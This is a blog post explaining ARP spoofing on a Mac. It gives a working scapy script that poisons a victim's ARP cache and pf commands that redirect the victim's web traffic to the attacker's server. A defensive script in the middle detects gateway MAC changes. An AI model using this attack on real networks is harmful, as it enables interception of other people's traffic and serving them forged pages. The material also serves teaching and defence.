Monday, October 26, 2015

ARP Spoofing on Mac

ARP refers to the Address Resolution Protocol, which is used to resolve Internet layer addresses (IP addresses) to link layer addresses (MAC addresses). Since frames on the local network are delivered at the link (or data link) layer, every system needs the MAC address of the next hop to be able to deliver a packet. So if I type https://google.com in my browser, my request first needs to go to a gateway (usually a router), which then puts it out into the world. ARP is used to do this mapping between the IP address and the MAC address.

ARP is a stateless protocol. Network hosts usually cache the ARP replies they receive. These mappings can be seen in the ARP table using
>> arp -a 
The protocol consists of a simple request and reply mechanism to associate IPs with MAC addresses. But sadly the protocol doesn't contain any method to authenticate these ARP packets. So if somebody sends you a fake ARP request, you don't have any mechanism to confirm its veracity.


If I wanted to spoof an ARP table entry, I would just send you a malicious ARP request. Most likely you would already have an ARP table entry for this address, so the packet could be flagged as a duplicate, but most OSes do not discard these duplicates. For example, Linux ignores unsolicited replies, but on the other hand uses requests it sees from other machines to update its cache. If you constantly bombard the victim with these ARP requests, the ARP table gets poisoned. Here's a script that does that:

from scapy.all import *
import time

op = 1  # ARP opcode 1 = request ("who-has")

victim_ip = ''      # victim
ip_to_spoof = ''    # gateway
attacker_mac = ''   # attacker's MAC

# Request that claims to come from the gateway's IP; scapy fills in
# the sender hardware address (hwsrc) with this machine's own MAC.
arp = ARP(op=op, psrc=ip_to_spoof, pdst=victim_ip, hwdst=attacker_mac)

# Keep re-sending so the victim's cache entry never expires back to the real MAC.
while True:
    send(arp)
    time.sleep(1)


It uses scapy as a dependency to create and send packets. Once you run the above script, you can check the new spoofed entry in the victim's ARP table using `arp -a`. Now all of the victim's traffic is going through your machine, and since most likely you wouldn't have IP forwarding enabled, the victim would be getting 404s.
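The same `arp -a` output the post uses to confirm the spoofed entry is also what a defender can watch to catch it. The following is an added example, not code from the original post: it parses macOS-style `arp -a` lines, compares a baseline snapshot against a later one, and raises an alert when the MAC recorded for an IP (the gateway in particular) changes or when one MAC is suddenly claimed by several IPs, which is exactly the footprint the script above leaves in the victim's cache. The two snapshots are constructed sample data, the function names are my own, and the line format assumed is the one macOS prints (`? (ip) at mac on en0 ...`, octets without leading zeros).

```python
import re
from collections import defaultdict

# One macOS `arp -a` line looks like (assumption, matches current macOS output):
#   ? (192.168.1.1) at 0:11:22:33:44:55 on en0 ifscope [ethernet]
ARP_LINE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>[0-9a-fA-F:]+|\(incomplete\))"
)


def normalize_mac(mac):
    """macOS prints octets without leading zeros; pad each to two hex digits."""
    return ":".join(part.lower().zfill(2) for part in mac.split(":"))


def parse_arp_table(text):
    """Return {ip: mac} from `arp -a` output, skipping incomplete entries."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if not m or m.group("mac") == "(incomplete)":
            continue
        table[m.group("ip")] = normalize_mac(m.group("mac"))
    return table


def find_mac_changes(baseline, current):
    """IPs whose MAC differs from the baseline: list of (ip, old_mac, new_mac)."""
    return [
        (ip, baseline[ip], current[ip])
        for ip in sorted(baseline)
        if ip in current and current[ip] != baseline[ip]
    ]


def find_shared_macs(table):
    """MACs claimed by more than one IP; a host answering for the gateway shows up here."""
    by_mac = defaultdict(list)
    for ip, mac in table.items():
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def audit(baseline_text, current_text, gateway_ip):
    """Produce human-readable alerts for the two poisoning symptoms."""
    baseline = parse_arp_table(baseline_text)
    current = parse_arp_table(current_text)
    alerts = []
    for ip, old, new in find_mac_changes(baseline, current):
        tag = "GATEWAY " if ip == gateway_ip else ""
        alerts.append(f"{tag}MAC changed for {ip}: {old} -> {new}")
    for mac, ips in find_shared_macs(current).items():
        alerts.append(f"MAC {mac} claimed by several IPs: {', '.join(ips)}")
    return alerts


# Constructed sample snapshots (not real captures): a clean table, then the
# same table after a host on .20 has taken over the gateway's entry.
BASELINE = """\
? (192.168.1.1) at 0:11:22:33:44:55 on en0 ifscope [ethernet]
? (192.168.1.20) at a4:83:e7:1:2:3 on en0 ifscope [ethernet]
? (192.168.1.50) at (incomplete) on en0 ifscope [ethernet]
"""
POISONED = """\
? (192.168.1.1) at a4:83:e7:1:2:3 on en0 ifscope [ethernet]
? (192.168.1.20) at a4:83:e7:1:2:3 on en0 ifscope [ethernet]
"""

if __name__ == "__main__":
    # In practice, feed this subprocess.check_output(["arp", "-a"]) on a timer.
    for alert in audit(BASELINE, POISONED, gateway_ip="192.168.1.1"):
        print("ALERT:", alert)
```

Run periodically against a baseline taken when the network is known-good; a gateway MAC flip is the single highest-value signal, and the shared-MAC check catches the case where the baseline itself was captured after poisoning started.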

To make it a bit more fun, you can also enable IP forwarding and serve spoofed pages to the victim. For example, you can do this:

# Enable packet forwarding on Mac
sudo sysctl -w net.inet.ip.forwarding=1

# Enable the packet filter (pf) on Mac
sudo pfctl -e

# Add this rule to your /etc/pf.conf after enabling pf
# ($victim_ip is a pf macro; define it near the top of pf.conf, e.g. victim_ip = "192.0.2.10")
rdr on en0 inet proto tcp from $victim_ip to any port = 80 -> 127.0.0.1

# Reload the PF configuration to apply the above rule
sudo pfctl -f /etc/pf.conf
The rdr rule above redirects all of the victim's HTTP traffic to the attacker's local HTTP web server.
